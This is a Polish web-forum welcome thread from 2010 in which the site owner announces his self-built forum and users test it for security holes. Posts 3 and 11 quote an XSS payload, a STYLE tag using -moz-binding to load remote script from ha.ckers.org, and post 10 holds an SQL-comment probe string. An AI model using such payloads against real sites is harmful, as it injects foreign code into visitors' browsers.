Witam na forum

2010-08-17 22:56:52 Post #1 nospor

 
Witam Was na moim forum.
Forum, jak zresztą cała ta strona, jest mojego autorstwa. Zachęcam do korzystania z niego i zgłaszania ewentualnych uwag czy też propozycji nowej funkcjonalności. Na chwilę obecną z forum mogą korzystać tylko zalogowani użytkownicy.

@TODO:
- udostępnić forum dla gości - zrobione
- podgląd postów
- inne ewentualne rzeczy zaproponowane przez Was

ps: gdybyście mieli problem z przeniesiem zalogowania na forum, to wyczyście wszystkie ciastka z domeny nospor.pl

2010-08-17 23:43:31 Post #2 vokiel

 
Widzę ładnie wkomponowałeś te forum w całą stronę. Niedługo zamiast strony domowej będziesz tu miał pokaźny serwis

2010-08-17 23:46:27 Post #3 nospor

 
Niedługo zamiast strony domowej będziesz tu miał pokaźny serwis
Pożyjemy zobaczymy

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Widzę, iż mnie hakujesz.... dobrze, testuj a nuż widelec... lepiej żebym padł ofiarą Twojego ataku niż kogoś innego

2010-08-17 23:48:18 Post #4 vokiel

 
Czuwasz

Przetestowałem kilka opcji XSS, z 17-21 sztuk różnych ataków. Jak dla mnie Twoje forum jest XSS-Free

2010-08-17 23:52:27 Post #5 nospor

 
Dzięki za testy

2010-08-18 10:45:44 Post #6 Michał

 
Forum fajne, zwłaszcza, ze ma modularną budowę

Może warto pomyśleć nad rangami na forum np. Moderator Member

2010-08-18 10:52:39 Post #7 nospor

 
W założeniu miało to być proste forum.
Wstępne wersje co są w innych projektach, które pisałem, są naprawde proste. Tę tutaj już odpicowałem trochę. Z czasem więc pewnie i moderatorzy się pojawią

2010-08-18 11:22:49 Post #8 Michał

 
Pochwaliłbyś się jakimiś linkami do projektów na twoim CMS....

2010-08-18 12:24:00 Post #9 vokiel

 
Test php bbcode
try 
  {
      list($insert_id, $total_rows) = DB::insert('users', array('username','password'))
          ->values(array('myusername',sha1('mypassword')))
          ->execute();
  			
      echo $insert_id .' '.$total_rows ;
  }
  catch ( Database_Exception $e )
  {
      echo $e->getMessage();
  }

2010-08-18 22:16:51 Post #10 spawnm

 
a'la test /*

2010-08-20 14:17:18 Post #11 korey

 
Siema wszystkim.

zaciekawił mnie ten kawałek tekstu
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

powie ktos cos wiecej na ten temat.?

2010-08-20 17:29:14 Post #12 nospor

 
Jest to próba wykonania na tej stronie obcego kodu js. Takie obce kody mogą być naprawdę groźne.

Odpowiedz

Ostatnio komentowane

  1. Mysql - FAQ Paweł
  2. Pager 2.5.1 oraz EPa... Na szybko2
  3. Pager 2.5.1 oraz EPa... Sławek
  4. Mysql - FAQ Piotr
  5. Liczba dni roboczych Na szybko2
  6. Liczba dni roboczych Naszybko
  7. Klasa widoku nospor

Skrypty użytkowników

  1. Klasa obsługi szablo... Lirdoner
  2. Sekcje user76
  3. Klasa walidująca for... user76
  4. Licznik Gości online korey
  5. Form Builder Comandeer
  6. Dynamiczny licznik z... korey
  7. Captcha Comandeer